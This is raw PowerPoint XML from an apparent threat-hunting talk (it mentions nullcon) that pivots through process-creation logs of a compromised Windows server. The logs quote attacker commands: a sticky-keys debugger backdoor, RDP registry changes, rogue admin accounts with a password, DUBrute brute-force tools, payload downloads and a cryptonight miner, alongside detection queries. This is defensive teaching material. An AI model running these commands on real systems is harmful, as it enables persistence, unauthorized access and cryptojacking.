                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> shell32.dll"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         16:35:35.7183857 """C:\Windows\System32\rundll32.exe"" C:\Windows\system32\mscories.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         16:35:36.1871327 C:\Windows\SysWOW64\runonce.exe /Run6432</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           16:35:36.3746315 """C:\Program Files\McAfee\Agent\x86\UpdaterUI.exe"" /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>StartedFromRunKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         16:35:39.1714886 """C:\Windows\explorer.exe"""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         16:36:03.4213334 """C:\Windows\System32\cmd.exe"""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1632" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           16:36:15.2181329 "REG  ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /v Debugger /t REG_SZ /d ""C:\windows\system32\cmd.exe"""</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252725" y="1391912"/>
            <a:ext cx="12182868" cy="1054846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9932CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ProdProcessCreationEvents</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NewProcessName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>endswith</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"\\reg.exe"</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"Image File Execution Options"</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and</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 add "</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"\\sethc.exe"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or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"\\magnify.exe"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or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"\\utilman.exe"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or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"\\osk.exe"</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project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C71585"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Subscription</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TimeCreated</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NewProcessName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SubjectUserName</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SubjectLogonId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1224" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252724" y="5547191"/>
            <a:ext cx="11546035" cy="657488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597"/>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9932CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ProdProcessCreationEvents</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C71585"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Computer</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SubjectUserName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NewProcessName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0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>endswith</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u="sng" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>\\cmd.exe</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CommandLine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contains</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err="1">
                <a:solidFill>
                  <a:srgbClr val="B22222"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sethc</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project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C71585"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Subscription</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TimeCreated</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NewProcessName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CommandLine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SubjectUserName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SubjectLogonId</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endPar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252724" y="6394730"/>
            <a:ext cx="9396992" cy="606488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597"/>
            <a:r>
              <a:rPr lang="en-US" sz="1632" kern="0" dirty="0" err="1">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CommandLine</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32" kern="0" dirty="0" err="1">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SubjectLogonId</a:t>
            </a:r>
            <a:b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br>
            <a:r>
              <a:rPr lang="en-US" sz="1632" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C:\windows\system32\cmd.exe sethc.exe</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32" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>211</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0x3e7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="676604" y="1418401"/>
            <a:ext cx="11083265" cy="3751791"/>
            <a:chOff x="2121085" y="1404124"/>
            <a:chExt cx="7422261" cy="2512505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121085" y="1404124"/>
              <a:ext cx="7422261" cy="2512505"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Connector 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3955675" y="2872407"/>
              <a:ext cx="796774"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43417" y="3150703"/>
              <a:ext cx="4027272"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3626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9A4277-953F-FD0C-95A8-78D9DA207A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Hearing about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nullcon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…in 2009</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDA9310E-70E5-3A79-B569-6A78AF345831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218237" y="2258548"/>
            <a:ext cx="5810495" cy="4343050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F49F07AD-A5E1-206D-752A-6FEE3EF0B120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="668924" y="1235418"/>
            <a:ext cx="4794068" cy="4523688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13791320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00547680"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="298809" y="523566"/>
          <a:ext cx="12137666" cy="6341714"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="12137666">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1684392900"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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C:\Windows\Explorer.EXE"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561939489"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="186521">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>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C:\Users\ADMINI~1\AppData\Local\Temp\3\wrsd.exe  429308 z</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49847818"/>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add "HKLM\SYSTEM\</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CurrentControlSet</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\Control\Terminal Server\</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WinStations</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\RDP-</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Tcp</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UserAuthentication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 REG_DWORD /d 1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358742346"/>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add "HKEY_LOCAL_MACHINE\SYSTEM\</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CurrentControlSet</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\Control\Terminal Server\</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WinStations</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\RDP-</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Tcp</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UserAuthentication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 REG_DWORD /d 1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478749151"/>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delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\</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CurrentVersion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\Policies\System"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legalnoticecaption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76110067"/>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delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\</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CurrentVersion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\Policies\System"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legalnoticetext</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638938443"/>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user ASPNET crystal123!@# /add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718346324"/>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localgroup Administrators ASPNET /add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289702643"/>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user ___VMware_Conv_SA___ crystal123!@# /add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722222803"/>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localgroup Administrators ___VMware_Conv_SA___ /add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59983110"/>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(x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4816 CREDAT:267521 /prefetch:2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571132999"/>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"C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FB7Z3X4W\TurboMailer-Setup.exe"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57070098"/>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TurboMailer</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\TurboMailer.exe"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974728998"/>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C:\Users\Administrator\Desktop\400k\400k.txt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754218661"/>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C:\Users\Administrator\AppData\Local\Temp\3\Temp1_DUB8.2.zip\DUB8.2\config.ini</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238528871"/>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"C:\Users\Administrator\AppData\Local\Temp\3\Temp1_DUB8.2.zip\DUB8.2\DUB8.2.exe"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232605103"/>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user guest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208397650"/>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(x86)\TurboMailer\turbomailer.exe"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131694483"/>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C:\Users\Administrator\Desktop\april17.txt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51946092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C:\Users\Administrator\AppData\Local\Temp\3\Temp1_march.zip\march.txt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27028788"/>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"C:\Users\Administrator\Downloads\dn2.exe"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588362767"/>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"C:\Users\Administrator\Downloads\f.exe"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310746249"/>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"C:\Users\Administrator\Downloads\x.exe"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946422716"/>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"C:\Users\Administrator\Downloads\y.exe"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86261029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"C:\Users\Administrator\Downloads\dn2.exe"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33749722"/>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"C:\Users\Administrator\Downloads\Stable_DUBrute_2.1\DUBrute 2.1 (UPDATE 03.03.12)\DUBrute.exe"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48048571"/>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C:\Users\Administrator\Downloads\Stable_DUBrute_2.1\DUBrute 2.1 (UPDATE 03.03.12)\good.txt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217010220"/>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C:\Users\Administrator\Downloads\Stable_DUBrute_2.1\DUBrute 2.1 (UPDATE 03.03.12)\Logins.txt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411595484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C:\Users\Administrator\Downloads\Stable_DUBrute_2.1\DUBrute 2.1 (UPDATE 03.03.12)\Passwords.txt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16635637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(x86)\Google\Chrome\Application\chrome.exe" -- "</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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2"/>
                        </a:rPr>
                        <a:t>http://119.10.151.120:1234/3.zip</a:t>
                      </a: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778246684"/>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"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Administrator\Downloads\DUBrute 2.1 (UPDATE 03.03.12)\ssleay32.dll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470992288"/>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C:\Users\Administrator\Downloads\DUBrute 2.1 (UPDATE 03.03.12)\config.ini</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4082942419"/>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(x86)\Google\Chrome\Application\chrome.exe" -- "</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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http://ys-h.ys168.com/3.0/548253621/SIuMfJl7K3T5561HXPJK/DUB_8.0.zip</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518938423"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="186521">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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"mstdc.exe -a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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cryptonight</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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bcn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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-u bond007.01 -p x -t 4"</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31700" marR="31700" marT="0" marB="0" anchor="b">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3150825482"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6860192" y="523566"/>
            <a:ext cx="3650702" cy="699453"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -111196"/>
              <a:gd name="adj2" fmla="val -32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wrsd.exe  429308 z</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="204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 name="Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6860191" y="1767217"/>
            <a:ext cx="5129386" cy="570544"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61118"/>
              <a:gd name="adj2" fmla="val -5575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reg</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delete ...</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legalnoticecaption</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 name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4599852" y="2639687"/>
            <a:ext cx="7682875" cy="1523768"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -55996"/>
              <a:gd name="adj2" fmla="val -833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user ASPNET crystal123!@# /add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user ___</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VMware_Conv_SA</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___ crystal123!@# /add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localgroup</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Administrators</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ASPNET </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localgroup</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Administrators</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___</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VMware_Conv_SA</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___ </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7" name="Rounded Rectangular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1831637" y="4049179"/>
            <a:ext cx="10057107" cy="1523768"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40982"/>
              <a:gd name="adj2" fmla="val -928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"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"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...Temporary Internet Files\...\TurboMailer-Setup.exe"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"C:\Program Files (x86)\</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TurboMailer</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TurboMailer.exe</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NOTEPAD.EXE C:\Users\Administrator\Desktop\400k\</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400k.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangular Callout 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2742530" y="5664800"/>
            <a:ext cx="7865002" cy="1108627"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -57124"/>
              <a:gd name="adj2" fmla="val 4057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chrome.exe -- </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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://ys-h.ys168.com/3.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" u="sng"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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/.../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" u="sng"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mstdc.exe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mstdc.exe -</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a </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cryptonight</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-o </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bcn</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-u bond007.01 -p x -t 4</a:t>
            </a:r>
            <a:endPar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31653A54-9BBA-3AC4-4789-9433187DE42F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298809" y="26851"/>
            <a:ext cx="11239464" cy="501676"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pivot to Device Session Activity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3328576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E39D15C-43F0-72D6-D712-F56A3DB4487B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Iterate until the Closure of the Pivoting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1063453" y="2052704"/>
            <a:ext cx="10309567" cy="4540198"/>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4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1063453" y="2052703"/>
            <a:ext cx="10309568" cy="356822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="505050"/>
          </a:solidFill>
          <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="505050">
                <a:shade val="50000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="40801" tIns="13600" rIns="13600" bIns="13600" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1020" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>    Port Scanning potential victims</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Diagram 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
